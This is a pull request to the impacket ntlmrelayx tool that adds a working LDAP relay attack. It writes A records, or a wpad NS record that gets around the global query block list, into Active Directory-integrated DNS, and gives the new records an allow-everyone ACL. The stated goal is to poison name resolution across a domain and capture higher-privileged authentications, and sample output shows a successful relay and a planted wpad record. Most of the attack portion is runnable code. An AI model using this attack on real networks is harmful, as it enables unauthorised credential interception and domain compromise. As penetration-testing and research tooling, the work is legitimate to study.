### PR TITLE
[ntlmrelayx] LDAP attack: Add DNS records through LDAP

### DIFF
--- a/examples/ntlmrelayx.py
+++ b/examples/ntlmrelayx.py
@@ -152,7 +152,7 @@ def start_servers(options, threads):
         c.setAttacks(PROTOCOL_ATTACKS)
         c.setLootdir(options.lootdir)
         c.setOutputFile(options.output_file)
-        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid)
+        c.setLDAPOptions(options.no_dump, options.no_da, options.no_acl, options.no_validate_privs, options.escalate_user, options.add_computer, options.delegate_access, options.dump_laps, options.dump_gmsa, options.dump_adcs, options.sid, options.add_dns_record)
         c.setRPCOptions(options.rpc_mode, options.rpc_use_smb, options.auth_smb, options.hashes_smb, options.rpc_smb_port)
         c.setMSSQLOptions(options.query)
         c.setInteractive(options.interactive)
@@ -317,6 +317,7 @@ if __name__ == '__main__':
     ldapoptions.add_argument('--dump-laps', action='store_true', required=False, help='Attempt to dump any LAPS passwords readable by the user')
     ldapoptions.add_argument('--dump-gmsa', action='store_true', required=False, help='Attempt to dump any gMSA passwords readable by the user')
     ldapoptions.add_argument('--dump-adcs', action='store_true', required=False, help='Attempt to dump ADCS enrollment services and certificate templates info')
+    ldapoptions.add_argument('--add-dns-record', nargs=2, action='store', metavar=('NAME', 'IPADDR'), required=False, help='Add the <NAME> record to DNS via LDAP pointing to <IPADDR>')
 
     #IMAP options
     imapoptions = parser.add_argument_group("IMAP client options")
@@ -359,6 +360,10 @@ if __name__ == '__main__':
     from impacket.examples.ntlmrelayx.clients import PROTOCOL_CLIENTS
     from impacket.examples.ntlmrelayx.attacks import PROTOCOL_ATTACKS
 
+    if options.add_dns_record:
+        dns_name = options.add_dns_record[0].lower()
+        if dns_name == 'wpad' or dns_name == '*':
+            logging.warning('You are asking to add a `wpad` or a wildcard DNS name. This can cause disruption in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config.')
 
     if options.codec is not None:
         codec = options.codec

--- a/impacket/examples/ntlmrelayx/attacks/ldapattack.py
+++ b/impacket/examples/ntlmrelayx/attacks/ldapattack.py
@@ -22,6 +22,7 @@ import datetime
 import binascii
 import codecs
 import re
+import dns.resolver
 import ldap3
 import ldapdomaindump
 from ldap3.core.results import RESULT_UNWILLING_TO_PERFORM
@@ -30,6 +31,8 @@ from ldap3.protocol.formatters.formatters import format_sid
 from ldap3.utils.conv import escape_filter_chars
 import os
 from Cryptodome.Hash import MD4
+from ipaddress import IPv4Address, AddressValueError
+from functools import partial
 
 from impacket import LOG
 from impacket.examples.ldap_shell import LdapShell
@@ -666,6 +669,134 @@ class LDAPAttack(ProtocolAttack):
 
         LOG.info("Done dumping ADCS info")
 
+    def addDnsRecord(self, name, ipaddr):
+        # https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1
+        def new_dns_namearray(data):
+            index_array = [pos for pos, char in enumerate(data) if char == '.']
+            name_array = bytearray()
+            if len(index_array) > 0:
+                name_start = 0
+                for index in index_array:
+                    name_end = index - name_start
+                    name_array.append(name_end)
+                    name_array.extend(data[name_start:name_end+name_start].encode("utf8"))
+                    name_start = index + 1
+                name_array.append(len(data) - name_start)
+                name_array.extend(data[name_start:].encode("utf8"))
+            else:
+                name_array.append(len(data))
+                name_array.extend(data.encode("utf8"))
+            return name_array
+
+        def new_dns_record(data, type):
+            if type == "A":
+                addr_data = data.split('.')
+                dns_type = bytearray((0x1, 0x0))
+                dns_length = int_to_4_bytes(len(addr_data))[0:2]
+                dns_data = bytearray(map(int, addr_data))
+            elif type == "NS":
+                dns_type = bytearray((0x2, 0x0))
+                dns_length = int_to_4_bytes(len(data) + 4)[0:2]
+                dns_data = bytearray()
+                dns_data.append(len(data) + 2)
+                dns_data.append(len(data.split(".")))
+                dns_data.extend(new_dns_namearray(data))
+                dns_data.append(0)
+            else:
+                return False
+
+            dns_ttl = bytearray(reversed(int_to_4_bytes(60)))
+            dns_record = bytearray(dns_length)
+            dns_record.extend(dns_type)
+            dns_record.extend(bytearray((0x05, 0xF0, 0x00, 0x00)))
+            dns_record.extend(int_to_4_bytes(get_next_serial_p()))
+            dns_record.extend(dns_ttl)
+            dns_record.extend((0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00))
+            dns_record.extend(dns_data)
+            return dns_record
+
+        def int_to_4_bytes(num):
+            arr = bytearray()
+            for i in range(4):
+                arr.append(num & 0xff)
+                num >>= 8
+            return arr
+
+        # https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py
+        def get_next_serial(server, zone):
+            dnsresolver = dns.resolver.Resolver()
+            dnsresolver.nameservers = [server]
+            res = dnsresolver.resolve(zone, 'SOA',tcp=True)
+            for answer in res:
+                return answer.serial + 1
+
+        try:
+            dns_naming_context = next((nc for nc in self.client.server.info.naming_contexts if "domaindnszones" in nc.lower()))
+        except StopIteration:
+            LOG.error('Could not find DNS naming context, aborting')
+            return
+
+        domaindn = self.client.server.info.other['defaultNamingContext'][0]
+        domain = re.sub(',DC=', '.', domaindn[domaindn.find('DC='):], flags=re.I)[3:]
+        dns_base_dn = 'DC=%s,CN=MicrosoftDNS,%s' % (domain, dns_naming_context)
+
+        get_next_serial_p = partial(get_next_serial, self.client.server.address_info[0][4][0], domain)
+
+        LOG.info('Checking if domain already has a `%s` DNS record' % name)
+        if self.client.search(dns_base_dn, '(name=%s)' % escape_filter_chars(name), search_scope=ldap3.LEVEL):
+            LOG.error('Domain already has a `%s` DNS record, aborting' % name)
+            return
+
+        LOG.info('Domain does not have a `%s` record!' % name)
+
+        ACL_ALLOW_EVERYONE_EVERYTHING = b'\x01\x00\x04\x9c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x02\x000\x00\x02\x00\x00\x00\x00\x00\x14\x00\xff\x01\x0f\x00\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\n\x14\x00\x00\x00\x00\x10\x01\x01\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00'
+
+        a_record_name = name
+        is_name_wpad = (a_record_name.lower() == 'wpad')
+
+        if is_name_wpad:
+            LOG.info('To add the `wpad` name, we need to bypass the GQBL: we\'ll first add a random `A` name and then add `wpad` as `NS` pointing to that name')
+            a_record_name = ''.join(random.choice(string.ascii_lowercase) for _ in range(12))
+
+        # First add an A record pointing to the provided IP
+        a_record_dn = 'DC=%s,%s' % (a_record_name, dns_base_dn)
+        a_record_data = {
+            'dnsRecord': new_dns_record(ipaddr, "A"),
+            'objectCategory': 'CN=Dns-Node,%s' % self.client.server.info.other['schemaNamingContext'][0],
+            'dNSTombstoned': False,
+            'name': a_record_name,
+            'nTSecurityDescriptor': ACL_ALLOW_EVERYONE_EVERYTHING,
+        }
+
+        LOG.info('Adding `A` record `%s` pointing to `%s` at `%s`' % (a_record_name, ipaddr, a_record_dn))
+        if not self.client.add(a_record_dn, ['top', 'dnsNode'], a_record_data):
+            LOG.error('Failed to add `A` record: ' % str(self.client.result))
+            return
+
+        LOG.info('Added `A` record `%s`. DON\'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)' % a_record_name)
+
+        if not is_name_wpad:
+            return
+
+        # Then add the wpad NS record
+        ns_record_name = 'wpad'
+        ns_record_dn = 'DC=%s,%s' % (ns_record_name, dns_base_dn)
+        ns_record_value = a_record_name + "." + domain
+        ns_record_data = {
+            'dnsRecord': new_dns_record(ns_record_value, "NS"),
+            'objectCategory': 'CN=Dns-Node,%s' % self.client.server.info.other['schemaNamingContext'][0],
+            'dNSTombstoned': False,
+            'name': ns_record_name,
+            'nTSecurityDescriptor': ACL_ALLOW_EVERYONE_EVERYTHING,
+        }
+
+        LOG.info('Adding `NS` record `%s` pointing to `%s` at `%s`' % (ns_record_name, ns_record_value, ns_record_dn))
+        if not self.client.add(ns_record_dn, ['top', 'dnsNode'], ns_record_data):
+            LOG.error('Failed to add `NS` record `wpad`: ' % str(self.client.result))
+            return
+
+        LOG.info('Added `NS` record `%s`. DON\'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)' % ns_record_name)
+
 
     def run(self):
         #self.client.search('dc=vulnerable,dc=contoso,dc=com', '(objectclass=person)')
@@ -836,6 +967,27 @@ class LDAPAttack(ProtocolAttack):
 
         if self.config.dumpadcs:
             self.dumpADCS()
+
+        if self.config.adddnsrecord:
+            name = self.config.adddnsrecord[0]
+            ipaddr = self.config.adddnsrecord[1]
+
+            dns_name_ok = True
+            dns_ipaddr_ok = True
+
+            # DNS name can either be a wildcard or just contain alphanum and hyphen
+            if (name != '*') and (re.search(r'[^0-9a-z-]', name, re.I)):
+                LOG.error("Invalid name for DNS record")
+                dns_name_ok = False
+
+            try:
+                IPv4Address(ipaddr)
+            except AddressValueError:
+                LOG.error("Invalid IPv4 for DNS record")
+                dns_ipaddr_ok = False
+
+            if dns_name_ok and dns_ipaddr_ok:
+                self.addDnsRecord(name, ipaddr)
 
         # Perform the Delegate attack if it is enabled and we relayed a computer account
         if self.config.delegateaccess and self.username[-1] == '$':

--- a/impacket/examples/ntlmrelayx/utils/config.py
+++ b/impacket/examples/ntlmrelayx/utils/config.py
@@ -160,7 +160,7 @@ class NTLMRelayxConfig:
     def setRandomTargets(self, randomtargets):
         self.randomtargets = randomtargets
 
-    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid):
+    def setLDAPOptions(self, dumpdomain, addda, aclattack, validateprivs, escalateuser, addcomputer, delegateaccess, dumplaps, dumpgmsa, dumpadcs, sid, adddnsrecord):
         self.dumpdomain = dumpdomain
         self.addda = addda
         self.aclattack = aclattack
@@ -172,6 +172,7 @@ class NTLMRelayxConfig:
         self.dumpgmsa = dumpgmsa
         self.dumpadcs = dumpadcs
         self.sid = sid
+        self.adddnsrecord = adddnsrecord
 
     def setMSSQLOptions(self, queries):
         self.queries = queries


### PR DESCRIPTION
Hi !

This PR adds the `--add-dns-record` as a ntlmrelayx LDAP attack, inspired by [Kevin Robertson](https://www.netspi.com/blog/technical/network-penetration-testing/exploiting-adidns/)'s [ADIDNS research](https://www.netspi.com/blog/technical/network-penetration-testing/adidns-revisited/), and his own implementation in [Inveigh](https://github.com/Kevin-Robertson/Inveigh).

The idea is being able to poison beyond the local subnet to get more authentications from hopefully higher-privileged users and machines. More info in the [accompanying blog post](https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html).

Ntlmrelayx will add the provided name as an `A` record pointing to the provided IP, unless the name is `wpad` in which case it will bypass the GQBL using a `NS` record. Please note that adding a wildcard or `wpad` record could create disruptions in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config. A warning was added to remind the user of that.

The output will be the following, in case of a `wpad` record:

```
[!] You are asking to add a `wpad` or a wildcard DNS name. This can cause disruption in larger networks (using multiple DNS subdomains) or if workstations already use a proxy config.
[*] HTTPD: Received connection from 10.72.72.101, attacking target ldap://dc1.domain.local
[*] Authenticating against ldap://dc1.domain.local as domain.local\BORDEAUX$ SUCCEED
[*] Assuming relayed user has privileges to escalate a user via ACL attack
[*] Checking if domain already has a `wpad` DNS record
[*] Domain does not have a `wpad` record!
[*] To add the `wpad` name, we need to bypass the GQBL: we'll first add a random `A` name and then add `wpad` as `NS` pointing to that name
[*] Adding `A` record `jwsgliwpffgv` pointing to `10.72.72.200` at `DC=jwsgliwpffgv,DC=DOMAIN.LOCAL,CN=MicrosoftDNS,DC=DomainDnsZones,DC=DOMAIN,DC=LOCAL`
[*] Added `A` record `jwsgliwpffgv`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
[*] Adding `NS` record `wpad` pointing to `jwsgliwpffgv.DOMAIN.LOCAL` at `DC=wpad,DC=DOMAIN.LOCAL,CN=MicrosoftDNS,DC=DomainDnsZones,DC=DOMAIN,DC=LOCAL`
[*] Added `NS` record `wpad`. DON'T FORGET TO CLEANUP (set `dNSTombstoned` to `TRUE`, set `dnsRecord` to a NULL byte)
```

Credits for Kevin Robertson for the research in implementation in [Powermad](https://github.com/Kevin-Robertson/Powermad) and [Inveigh](https://github.com/Kevin-Robertson/Inveigh), and to Dirk-Jan Mollema for [dnstool.py](https://github.com/dirkjanm/krbrelayx/blob/master/dnstool.py).

Cheers !